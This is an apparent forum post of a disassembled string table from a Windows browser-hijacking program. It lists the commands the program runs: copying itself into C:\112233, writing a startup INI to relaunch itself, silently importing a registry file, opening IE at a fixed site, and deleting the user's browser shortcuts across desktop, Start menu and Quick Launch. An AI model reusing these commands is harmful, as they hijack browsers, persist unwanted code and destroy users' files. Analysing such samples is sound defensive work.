dseg02:5A41 aCmd_exeCDel db 'cmd.exe /c del ',0 ; DATA XREF: WINMAIN+F�o
dseg02:5A51 aCmd_exeCDel_0 db 'cmd.exe /c Del ',0 ; DATA XREF: WINMAIN+3D�o
dseg02:5A61 aC112233 db 'C:\112233\',0 ; DATA XREF: WINMAIN+6B�o
dseg02:5A6C asc_6ECC db '%x',0 ; DATA XREF: WINMAIN+C2�o
dseg02:5A6F asc_6ECF db '%x',0 ; DATA XREF: WINMAIN+F1�o
dseg02:5A72 a_exe db '.exe',0
dseg02:5A77 aCmd_exeCCopy db 'cmd.exe /c copy ',0 ; DATA XREF: WINMAIN+175�o
dseg02:5A88 db '"',0
dseg02:5A8A aC112233Zz_exe db '" C:\112233\ZZ.exe',0
dseg02:5A9D aC112233Zz_ex_0 db 'C:\112233\ZZ.EXE',0
dseg02:5AAE ; char aCmd_exeCMkdirC[]
dseg02:5AAE aCmd_exeCMkdirC db 'cmd.exe /c mkdir c:\112233',0 ; DATA XREF: WINMAIN:loc_2BB�o
dseg02:5AC9 ; char aCmd_exeCEchoSt[]
dseg02:5AC9 aCmd_exeCEchoSt db 'cmd.exe /c echo [StartUpDvr]>>C:\112233\StartupDVR.ini',0
dseg02:5AC9 ; DATA XREF: WINMAIN+208�o
dseg02:5B00 ; char aCmd_exeCEchoPr[]
dseg02:5B00 aCmd_exeCEchoPr db 'cmd.exe /c echo prompt=start up system now?>>C:\112233\StartupDVR'
dseg02:5B00 ; DATA XREF: WINMAIN+216�o
dseg02:5B00 db '.ini',0
dseg02:5B46 ; char aCmd_exeCEchoCo[]
dseg02:5B46 aCmd_exeCEchoCo db 'cmd.exe /c echo countdown=started %2d seconds>>C:\112233\StartupD'
dseg02:5B46 ; DATA XREF: WINMAIN+224�o
dseg02:5B46 db 'VR.ini',0
dseg02:5B8E ; char aCmd_exeCEchoSe[]
dseg02:5B8E aCmd_exeCEchoSe db 'cmd.exe /c echo second=2 >>C:\112233\StartupDVR.ini',0
dseg02:5B8E ; DATA XREF: WINMAIN+232�o
dseg02:5BC2 ; char aCmd_exeCEchoEx[]
dseg02:5BC2 aCmd_exeCEchoEx db 'cmd.exe /c echo Exec = zz.exe>>C:\112233\StartupDVR.ini',0
dseg02:5BC2 ; DATA XREF: WINMAIN+240�o
dseg02:5BFA ; char aC112233A_reg[]
dseg02:5BFA aC112233A_reg db 'C:\112233\a.reg',0 ; DATA XREF: WINMAIN+24E�o
dseg02:5C0A ; char aCProgra1Intern[]
dseg02:5C0A aCProgra1Intern db 'C:\PROGRA~1\INTERN~1\IEXPLORE.EXE http://www.tao12388.com/',0
dseg02:5C0A ; DATA XREF: WINMAIN:loc_3A1�o
dseg02:5C45 ; char aTaskkill_exeFI[]
dseg02:5C45 aTaskkill_exeFI db 'taskkill.exe /f /im ntvdm.exe',0 ; DATA XREF: WINMAIN+2FD�o
dseg02:5C63 ; char aCmd_exeCDelUse[]
dseg02:5C63 aCmd_exeCDelUse db 'cmd.exe /c del %USERPROFILE%\桌面\*.url',0
dseg02:5C63 ; DATA XREF: WINMAIN:loc_3DE�o
dseg02:5C8B ; char aCmd_exeCDelU_0[]
dseg02:5C8B aCmd_exeCDelU_0 db 'cmd.exe /c del %USERPROFILE%\桌面\ie*.lnk',0
dseg02:5C8B ; DATA XREF: WINMAIN+31C�o
dseg02:5CB5 ; char aCmd_exeCDelU_1[]
dseg02:5CB5 aCmd_exeCDelU_1 db 'cmd.exe /c del %USERPROFILE%\桌面\int*.lnk',0
dseg02:5CB5 ; DATA XREF: WINMAIN+32A�o
dseg02:5CE0 ; char aCmd_exeCDelAll[]
dseg02:5CE0 aCmd_exeCDelAll db 'cmd.exe /c del %ALLUSERSPROFILE%\桌面\*.url',0
dseg02:5CE0 ; DATA XREF: WINMAIN+338�o
dseg02:5D0C ; char aCmd_exeCDelA_0[]
dseg02:5D0C aCmd_exeCDelA_0 db 'cmd.exe /c del %ALLUSERSPROFILE%\桌面\ie*.lnk',0
dseg02:5D0C ; DATA XREF: WINMAIN+346�o
dseg02:5D3A ; char aCmd_exeCDelA_1[]
dseg02:5D3A aCmd_exeCDelA_1 db 'cmd.exe /c del %ALLUSERSPROFILE%\桌面\int*.lnk',0
dseg02:5D3A ; DATA XREF: WINMAIN+354�o
dseg02:5D69 ; char aCmd_exeCDelU_2[]
dseg02:5D69 aCmd_exeCDelU_2 db 'cmd.exe /c del %USERPROFILE%\「开始~1\*.url',0
dseg02:5D69 ; DATA XREF: WINMAIN+362�o
dseg02:5D95 ; char aCmd_exeCDelU_3[]
dseg02:5D95 aCmd_exeCDelU_3 db 'cmd.exe /c del %USERPROFILE%\「开始~1\ie*.lnk',0
dseg02:5D95 ; DATA XREF: WINMAIN+370�o
dseg02:5DC3 ; char aCmd_exeCDelU_4[]
dseg02:5DC3 aCmd_exeCDelU_4 db 'cmd.exe /c del %USERPROFILE%\「开始~1\int*.lnk',0
dseg02:5DC3 ; DATA XREF: WINMAIN+37E�o
dseg02:5DF2 ; char aCmd_exeCDelA_2[]
dseg02:5DF2 aCmd_exeCDelA_2 db 'cmd.exe /c del %ALLUSERSPROFILE%\「开始~1\*.url',0
dseg02:5DF2 ; DATA XREF: WINMAIN+38C�o
dseg02:5E22 ; char aCmd_exeCDelA_3[]
dseg02:5E22 aCmd_exeCDelA_3 db 'cmd.exe /c del %ALLUSERSPROFILE%\「开始~1\ie*.lnk',0
dseg02:5E22 ; DATA XREF: WINMAIN+39A�o
dseg02:5E54 ; char aCmd_exeCDelA_4[]
dseg02:5E54 aCmd_exeCDelA_4 db 'cmd.exe /c del %ALLUSERSPROFILE%\「开始~1\int*.lnk',0
dseg02:5E54 ; DATA XREF: WINMAIN+3A8�o
dseg02:5E87 ; char aCmd_exeCDelApp[]
dseg02:5E87 aCmd_exeCDelApp db 'cmd.exe /c del %APPDATA%\MICROS~1\INTERN~1\QUICKL~1\*.url',0
dseg02:5E87 ; DATA XREF: WINMAIN+3B6�o
dseg02:5EC1 ; char aCmd_exeCDelA_5[]
dseg02:5EC1 aCmd_exeCDelA_5 db 'cmd.exe /c del %APPDATA%\MICROS~1\INTERN~1\QUICKL~1\ie*.lnk',0
dseg02:5EC1 ; DATA XREF: WINMAIN+3C4�o
dseg02:5EFD ; char aCmd_exeCDelA_6[]
dseg02:5EFD aCmd_exeCDelA_6 db 'cmd.exe /c del %APPDATA%\MICROS~1\INTERN~1\QUICKL~1\int*.lnk',0
dseg02:5EFD ; DATA XREF: WINMAIN+3D2�o
dseg02:5F3A ; char aCmd_exeCDelA_7[]
dseg02:5F3A aCmd_exeCDelA_7 db 'cmd.exe /c del %APPDATA%\MICROS~1\INTERN~1\QUICKL~1\启动*.lnk',0
dseg02:5F3A ; DATA XREF: WINMAIN+3E0�o
dseg02:5F78 ; char aCWindowsRegedi[]
dseg02:5F78 aCWindowsRegedi db 'C:\windows\regedit.exe /s C:\112233\a.reg',0
dseg02:5F78 ; DATA XREF: WINMAIN+3EE�o
dseg02:5FA2 ; char aCmd_exeCDelC11[]
dseg02:5FA2 aCmd_exeCDelC11 db 'cmd.exe /c del C:\112233\a.reg',0 ; DATA XREF: WINMAIN+3FC�o
dseg02:5FC1 ; char aProgman[]
dseg02:5FC1 aProgman db 'Progman',0 ; DATA XREF: WINMAIN+40A�o
dseg02:5FC9 ; char aCmd_exeCRdSQC1[]
dseg02:5FC9 aCmd_exeCRdSQC1 db 'cmd.exe /c rd /s /q c:\112233',0
dseg02:5FC9 ; DATA XREF: WINMAIN:loc_50B�o
dseg02:5FE7 ; char aTaskkill_exe_0[]
dseg02:5FE7 aTaskkill_exe_0 db 'taskkill.exe /f /im ntvdm.exe',0 ; DATA XREF: WINMAIN+449�o
|
楼主: Howl
[复制链接]
发表于 2012-5-24 11:47:45
